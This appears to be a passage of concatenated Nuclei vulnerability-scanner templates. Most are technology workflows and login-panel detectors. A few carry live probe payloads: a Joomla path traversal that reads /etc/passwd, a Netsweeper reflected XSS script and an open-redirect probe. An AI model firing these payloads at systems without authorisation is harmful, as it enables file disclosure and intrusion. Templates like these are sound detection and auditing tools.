Welcome to (.+)<\/h1>' 31 | -------------------------------------------------------------------------------- /jboss-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: jboss-workflow 2 | 3 | info: 4 | name: JBoss Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all JBoss related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/jboss-detect.yaml 10 | subtemplates: 11 | - tags: jboss -------------------------------------------------------------------------------- /jeedom-panel.yaml: -------------------------------------------------------------------------------- 1 | id: jeedom-panel 2 | 3 | info: 4 | name: Jeedom Login Panel 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"Jeedom" 9 | tags: panel,jeedom,login 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/index.php?v=d" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - "Jeedom" 22 | - "JEEDOM_PRODUCT_NAME" 23 | condition: and 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /jeedom-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: jeedom-workflow 2 | 3 | info: 4 | name: Jeedom Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Jeedom related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: exposed-panels/jeedom-panel.yaml 10 | subtemplates: 11 | - tags: jeedom 12 | -------------------------------------------------------------------------------- /jenkins-detect.yaml: -------------------------------------------------------------------------------- 1 | id: jenkins-detect 2 | 3 | info: 4 | name: Jenkins Detection 5 | author: philippdelteil,daffainfo,c-sh0 6 | severity: info 7 | reference: 8 | - https://www.jenkins.io/doc/book/using/remote-access-api/#RemoteaccessAPI-DetectingJenkinsversion 9 | - https://github.com/jenkinsci/jenkins/pull/470 10 | - https://www.jenkins.io/doc/book/security/access-control/permissions/#access-granted-without-overallread 11 | metadata: 12 | shodan-query: http.favicon.hash:81586312 13 | tags: tech,jenkins 14 | 15 | requests: 16 | - method: GET 17 | path: 18 | - "{{BaseURL}}" 19 | - "{{BaseURL}}/whoAmI/" 20 | 21 | redirects: true 22 | max-redirects: 2 23 | stop-at-first-match: true 24 | matchers-condition: and 25 | matchers: 26 | - type: word 27 | part: header 28 | words: 29 | - "x-jenkins" 30 | case-insensitive: true 31 | 32 | - type: word 33 | words: 34 | - "Jenkins" 35 | 36 | extractors: 37 | - type: kval 38 | kval: 39 | - x_jenkins 40 | -------------------------------------------------------------------------------- /jetty-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: jetty-workflow 2 | 3 | info: 4 | name: Jetty Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Jetty related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: jetty 12 | subtemplates: 13 | - tags: jetty 14 | -------------------------------------------------------------------------------- /joomla-jvehicles-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: joomla-jvehicles-lfi 2 | 3 | info: 4 | name: Joomla! 
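Component com_jvehicles - Local File Inclusion
5  |   author: daffainfo
6  |   severity: high
7  |   description: A local file inclusion vulnerability in the Jvehicles (com_jvehicles) component version 1.0 for Joomla! allows remote attackers to load arbitrary files via the controller parameter in index.php.
8  |   reference:
9  |     - https://www.exploit-db.com/exploits/11997
10 |   classification:
11 |     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
12 |     cvss-score: 8.6
13 |     cwe-id: CWE-22
14 |   remediation: Upgrade to a supported version.
15 |   tags: cve,cve2010,joomla,lfi  # NOTE(review): carries cve/cve2010 tags but the template names no CVE id; confirm the id or drop the tags
16 | # Reported only when the response status is 200 and the response matches a passwd-style root entry (root:.*:0:0).
17 | requests:
18 |   - method: GET
19 |     path:
20 |       - "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00"
21 |     matchers-condition: and
22 |     matchers:
23 |       - type: regex
24 |         regex:
25 |           - "root:.*:0:0"
26 |       - type: status
27 |         status:
28 |           - 200
29 |
30 | # Enhanced by cs on 2022/03/25
31 |
--------------------------------------------------------------------------------
/joomla-workflow.yaml:
--------------------------------------------------------------------------------
1  | id: joomla-workflow
2  | # Gated workflow: templates tagged "joomla" run only after tech-detect reports its "joomla" matcher.
3  | info:
4  |   name: Joomla! Security Checks
5  |   author: daffainfo
6  |   description: A simple workflow that runs all Joomla! related nuclei templates on a given target.
7  |
8  | workflows:
9  |   - template: technologies/tech-detect.yaml
10 |     matchers:
11 |       - name: joomla
12 |         subtemplates:
13 |           - tags: joomla
14 |
--------------------------------------------------------------------------------
/kentico-workflow.yaml:
--------------------------------------------------------------------------------
1  | id: kentico-workflow
2  |
3  | info:
4  |   name: Kentico CMS Security Checks
5  |   author: daffainfo
6  |   description: A simple workflow that runs all Kentico CMS related nuclei templates on a given target.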
7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: kentico 12 | subtemplates: 13 | - tags: kentico -------------------------------------------------------------------------------- /keycloak-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: keycloak-workflow 2 | 3 | info: 4 | name: Keycloak Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Keycloak related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/key-cloak-admin-panel.yaml 10 | subtemplates: 11 | - tags: keycloak 12 | -------------------------------------------------------------------------------- /kibana-panel.yaml: -------------------------------------------------------------------------------- 1 | id: kibana-panel 2 | 3 | info: 4 | name: Kibana Panel Login 5 | author: petruknisme,daffainfo,c-sh0 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"Kibana" 9 | tags: panel,kibana 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | - "{{BaseURL}}/login" 16 | - "{{BaseURL}}/app/kibana" 17 | 18 | stop-at-first-match: true 19 | redirects: true 20 | max-redirects: 2 21 | matchers-condition: or 22 | matchers: 23 | - type: word 24 | part: body 25 | words: 26 | - "Kibana" 27 | - "Elastic" 28 | - "Kibana Login" 29 | condition: or 30 | 31 | - type: regex 32 | part: header 33 | regex: 34 | - '(?i)(Kbn-Name)' 35 | -------------------------------------------------------------------------------- /kibana-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: kibana-workflow 2 | 3 | info: 4 | name: Kibana Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Kibana related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: exposed-panels/kibana-panel.yaml 10 | subtemplates: 11 | - tags: kibana 12 | -------------------------------------------------------------------------------- /kindeditor-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: kindeditor-workflow 2 | 3 | info: 4 | name: KindEditor Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all KindEditor related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: kindeditor 12 | subtemplates: 13 | - tags: kindeditor -------------------------------------------------------------------------------- /kong-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: kong-workflow 2 | 3 | info: 4 | name: Kong Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Kong related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/kong-detect.yaml 10 | subtemplates: 11 | - tags: kong -------------------------------------------------------------------------------- /lanproxy-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: lanproxy-workflow 2 | 3 | info: 4 | name: Lanproxy Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Lanproxy related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: lanproxy 12 | subtemplates: 13 | - tags: lanproxy -------------------------------------------------------------------------------- /lansweeper-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: lansweeper-workflow 2 | 3 | info: 4 | name: Lansweeper Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Lansweeper related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/lansweeper-login.yaml 10 | subtemplates: 11 | - tags: lansweeper 12 | -------------------------------------------------------------------------------- /laravel-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: laravel-workflow 2 | 3 | info: 4 | name: Laravel Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Laravel related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: laravel 12 | subtemplates: 13 | - tags: laravel -------------------------------------------------------------------------------- /magmi-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: magmi-workflow 2 | 3 | info: 4 | name: MAGMI Security Checks 5 | author: dwisiswant0,daffainfo 6 | description: A simple workflow that runs all MAGMI related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/magmi-detect.yaml 10 | subtemplates: 11 | - tags: magmi -------------------------------------------------------------------------------- /maian-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: maian-workflow 2 | 3 | info: 4 | name: Maian Cart Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Maian Cart related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/maian-cart-detect.yaml 10 | subtemplates: 11 | - tags: maian -------------------------------------------------------------------------------- /manageengine-opmanager.yaml: -------------------------------------------------------------------------------- 1 | id: manageengine-opmanager 2 | 3 | info: 4 | name: ZOHO ManageEngine OpManager 5 | author: dhiyaneshDK,daffainfo 6 | severity: info 7 | reference: 8 | - https://www.manageengine.com/ 9 | metadata: 10 | shodan-query: http.title:"OpManager Plus" 11 | tags: panel,zoho,manageengine 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - '{{BaseURL}}' 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "
" 24 | - "
" 25 | - "
" 26 | condition: and 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /mantisbt-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: mantisbt-workflow 2 | 3 | info: 4 | name: MantisBT Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all MantisBT related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/mantis-detect.yaml 10 | subtemplates: 11 | - tags: mantisbt 12 | -------------------------------------------------------------------------------- /mautic-crm-panel.yaml: -------------------------------------------------------------------------------- 1 | id: mautic-crm-panel 2 | 3 | info: 4 | name: Mautic CRM Panel Login 5 | author: cyllective,daffainfo 6 | severity: info 7 | description: Mautic is a free and open-source marketing automation tool for Content Management, Social Media, Email Marketing, and can be used for the integration of social networks, campaign management, forms, 8 | questionnaires, reports, etc. 9 | reference: 10 | - https://github.com/mautic/mautic 11 | tags: tech,mautic,crm 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}/s/login" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - 'Mautic' 24 | - 'var mauticBasePath' 25 | condition: and 26 | 27 | - type: status 28 | status: 29 | - 200 30 | -------------------------------------------------------------------------------- /mautic-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: mautic-workflow 2 | 3 | info: 4 | name: Mautic CRM Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Mautic CRM related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/favicon-detection.yaml 10 | matchers: 11 | - name: mautic 12 | subtemplates: 13 | - tags: mautic -------------------------------------------------------------------------------- /metabase-panel.yaml: -------------------------------------------------------------------------------- 1 | id: metabase-panel 2 | 3 | info: 4 | name: Metabase Login Panel 5 | author: revblock,daffainfo 6 | severity: info 7 | description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source 8 | metadata: 9 | shodan-query: http.title:"Metabase" 10 | tags: panel,metabase,login 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/auth/login" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 22 | 23 | - type: word 24 | part: body 25 | words: 26 | - "Metabase" 27 | - "window.MetabaseBootstrap" 28 | - "window.MetabaseRoot" 29 | condition: and 30 | 31 | extractors: 32 | - type: regex 33 | part: body 34 | group: 1 35 | regex: 36 | - '"(v\d+.\d+.\d+)"' 37 | -------------------------------------------------------------------------------- /metabase-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: metabase-workflow 2 | 3 | info: 4 | name: Metabase Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Metabase Pipeline related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: exposed-panels/metabase-panel.yaml 10 | subtemplates: 11 | - tags: metabase 12 | -------------------------------------------------------------------------------- /metinfo-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: metinfo-workflow 2 | 3 | info: 4 | name: MetInfo Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all MetInfo related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: metinfo 12 | subtemplates: 13 | - tags: metinfo -------------------------------------------------------------------------------- /microsoft-exchange-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: microsoft-exchange-workflow 2 | 3 | info: 4 | name: Microsoft Exchange Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Microsoft Exchange related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/microsoft/ms-exchange-server.yaml 10 | subtemplates: 11 | - tags: exchange -------------------------------------------------------------------------------- /microstrategy-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: microstrategy-workflow 2 | 3 | info: 4 | name: MicroStrategy Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all MicroStrategy related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/microstrategy-detect.yaml 10 | subtemplates: 11 | - tags: microstrategy -------------------------------------------------------------------------------- /mobileiron-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: mobileiron-workflow 2 | 3 | info: 4 | name: MobileIron Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all MobileIron related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/mobileiron-login.yaml 10 | subtemplates: 11 | - tags: mobileiron -------------------------------------------------------------------------------- /moodle-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: moodle-workflow 2 | 3 | info: 4 | name: Moodle Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Moodle related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: moodle 12 | subtemplates: 13 | - tags: moodle 14 | -------------------------------------------------------------------------------- /netsweeper-open-redirect.yaml: -------------------------------------------------------------------------------- 1 | id: netsweeper-open-redirect 2 | 3 | info: 4 | name: Netsweeper 4.0.9 - Open Redirection 5 | author: daffainfo 6 | severity: medium 7 | description: Netsweeper version 4.0.9 was vulnerable to an Unauthenticated and Authenticated Open Redirect vulnerability. 
8 | reference: 9 | - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz 10 | tags: netsweeper,redirect 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://interact.sh/" 16 | 17 | matchers: 18 | - type: regex 19 | part: header 20 | regex: 21 | - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' 22 | -------------------------------------------------------------------------------- /netsweeper-rxss.yaml: -------------------------------------------------------------------------------- 1 | id: netsweeper-rxss 2 | 3 | info: 4 | name: Netsweeper 4.0.9 - Cross-Site Scripting 5 | author: daffainfo 6 | severity: medium 7 | reference: 8 | - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz 9 | tags: netsweeper,xss 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter=' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - '' 22 | 23 | - type: word 24 | part: header 25 | words: 26 | - text/html 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /netsweeper-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: netsweeper-workflow 2 | 3 | info: 4 | name: Netsweeper Security Checks 5 | author: dwisiswant0,daffainfo 6 | description: A simple workflow that runs all netsweeper related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/netsweeper-webadmin-detect.yaml 10 | subtemplates: 11 | - tags: netsweeper -------------------------------------------------------------------------------- /nette-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: nette-workflow 2 | 3 | info: 4 | name: Nette Framework Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Nette Framework related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: nette 12 | subtemplates: 13 | - tags: nette -------------------------------------------------------------------------------- /nginx-version.yaml: -------------------------------------------------------------------------------- 1 | id: nginx-version 2 | 3 | info: 4 | name: Nginx version detect 5 | author: philippedelteil,daffainfo 6 | severity: info 7 | description: Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets. 8 | tags: tech,nginx 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: regex 18 | part: header 19 | regex: 20 | - 'nginx/[0-9.]+' 21 | 22 | - type: status 23 | status: 24 | - 200 25 | 26 | extractors: 27 | - type: regex 28 | part: header 29 | regex: 30 | - 'nginx/[0-9.]+' 31 | -------------------------------------------------------------------------------- /node-red-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: node-red-workflow 2 | 3 | info: 4 | name: Node-RED-Dashboard Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Node-RED-Dashboard related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/node-red-detect.yaml 10 | subtemplates: 11 | - tags: node-red-dashboard 12 | -------------------------------------------------------------------------------- /novnc-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: novnc-workflow 2 | 3 | info: 4 | name: noVNC Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all noVNC related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: novnc 12 | subtemplates: 13 | - tags: novnc -------------------------------------------------------------------------------- /ofbiz-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: ofbiz-workflow 2 | 3 | info: 4 | name: OFBiz Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all OFBiz related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: apache-ofbiz 12 | subtemplates: 13 | - tags: ofbiz 14 | -------------------------------------------------------------------------------- /oneblog-detect.yaml: -------------------------------------------------------------------------------- 1 | id: oneblog-detect 2 | 3 | info: 4 | name: OneBlog Detect 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | tags: tech,oneblog 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - 'OneBlog开源博客后台管理系统' 20 | - 'Opencast' 23 | 24 | - type: status 25 | status: 26 | - 200 27 | 28 | # Enhanced by mp on 2022/04/21 29 | -------------------------------------------------------------------------------- /openemr-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: openemr-workflow 2 | 3 | info: 4 | name: OpenEMR Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all OpenEMR related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/openemr-detect.yaml 10 | subtemplates: 11 | - tags: openemr 12 | -------------------------------------------------------------------------------- /opensis-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: opensis-workflow 2 | 3 | info: 4 | name: OpenSIS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all OpenSIS related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: exposed-panels/opensis-panel.yaml 10 | subtemplates: 11 | - tags: opensis 12 | -------------------------------------------------------------------------------- /opensns-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: opensns-workflow 2 | 3 | info: 4 | name: OpenSNS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all OpenSNS related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/favicon-detection.yaml 10 | matchers: 11 | - name: opensns 12 | subtemplates: 13 | - tags: opensns -------------------------------------------------------------------------------- /oscommerce-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: oscommerce-workflow 2 | 3 | info: 4 | name: osCommerce Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all osCommerce related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: oscommerce 12 | subtemplates: 13 | - tags: oscommerce -------------------------------------------------------------------------------- /pandora-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: pandora-workflow 2 | 3 | info: 4 | name: Pandora FMS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Pandora FMS related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: exposed-panels/pandora-fms-console.yaml 10 | subtemplates: 11 | - tags: pandora 12 | -------------------------------------------------------------------------------- /pega-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: pega-workflow 2 | 3 | info: 4 | name: Pega Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Pega related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/pega-detect.yaml 10 | subtemplates: 11 | - tags: pega 12 | -------------------------------------------------------------------------------- /pentaho-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: pentaho-workflow 2 | 3 | info: 4 | name: Pentaho Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Pentaho related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/pentaho-panel.yaml 10 | subtemplates: 11 | - tags: pentaho 12 | -------------------------------------------------------------------------------- /phpcollab-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: phpcollab-workflow 2 | 3 | info: 4 | name: PhpCollab Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all PhpCollab related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/phpcollab-panel.yaml 10 | subtemplates: 11 | - tags: phpcollab 12 | -------------------------------------------------------------------------------- /phppgadmin-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: phppgadmin-workflow 2 | 3 | info: 4 | name: phpPgAdmin Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all phpPgAdmin related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: phppgadmin 12 | subtemplates: 13 | - tags: phppgadmin -------------------------------------------------------------------------------- /phpwiki-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: phpwiki-workflow 2 | 3 | info: 4 | name: phpwiki Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all phpwiki related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: phpwiki 12 | subtemplates: 13 | - tags: phpwiki -------------------------------------------------------------------------------- /powercreator-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: powercreator-workflow 2 | 3 | info: 4 | name: PowerCreator CMS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all PowerCreator CMS related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: powercreator 12 | subtemplates: 13 | - tags: powercreator -------------------------------------------------------------------------------- /processmaker-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: processmaker-workflow 2 | 3 | info: 4 | name: ProcessMaker Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all ProcessMaker related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: processmaker 12 | subtemplates: 13 | - tags: processmaker -------------------------------------------------------------------------------- /prometheus-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: prometheus-workflow 2 | 3 | info: 4 | name: Prometheus Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Prometheus related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/prometheus-exposed-panel.yaml 10 | subtemplates: 11 | - tags: prometheus -------------------------------------------------------------------------------- /prtg-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: prtg-workflow 2 | 3 | info: 4 | name: PRTG Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all PRTG related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/prtg-detect.yaml 10 | subtemplates: 11 | - tags: prtg -------------------------------------------------------------------------------- /pulsesecure-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: pulsesecure-workflow 2 | 3 | info: 4 | name: Pulse Connect Secure Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Pulse Connect Secure related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: pulsesecure 12 | subtemplates: 13 | - tags: pulsesecure -------------------------------------------------------------------------------- /qcubed-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: qcubed-workflow 2 | 3 | info: 4 | name: Qcubed Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Qcubed related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: qcubed 12 | subtemplates: 13 | - tags: qcubed -------------------------------------------------------------------------------- /r-seenet-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: r-seenet-workflow 2 | 3 | info: 4 | name: R-SeeNet Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all R-SeeNet related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/rseenet-detect.yaml 10 | subtemplates: 11 | - tags: rseenet 12 | -------------------------------------------------------------------------------- /rancher-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: rancher-workflow 2 | 3 | info: 4 | name: Rancher Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Rancher related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: exposed-panels/rancher-panel.yaml 10 | subtemplates: 11 | - tags: rancher 12 | -------------------------------------------------------------------------------- /rconfig-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: rconfig-workflow 2 | 3 | info: 4 | name: rConfig Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all rConfig related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: rconfig 12 | subtemplates: 13 | - tags: rconfig 14 | -------------------------------------------------------------------------------- /remkon-manager-panel.yaml: -------------------------------------------------------------------------------- 1 | id: remkon-manager-panel 2 | 3 | info: 4 | name: Remkon Device Manager Login Panel 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"Remkon Device Manager" 9 | tags: panel,remkon,login 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/login.php' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | 22 | - type: word 23 | part: body 24 | words: 25 | - "Remkon Device Manager" 26 | -------------------------------------------------------------------------------- /ricoh-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: ricoh-workflow 2 | 3 | info: 4 | name: Ricoh Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Ricoh related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/favicon-detection.yaml 10 | matchers: 11 | - name: ricoh 12 | subtemplates: 13 | - tags: ricoh -------------------------------------------------------------------------------- /rosariosis-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: rosariosis-workflow 2 | 3 | info: 4 | name: Rosario Student Information System (rosariosis) Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Rosario Student Information System (rosariosis) related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/rosariosis-detect.yaml 10 | subtemplates: 11 | - tags: rosariosis 12 | -------------------------------------------------------------------------------- /rstudio-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: rstudio-workflow 2 | 3 | info: 4 | name: RStudio Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all RStudio related nuclei templates on a given target. 
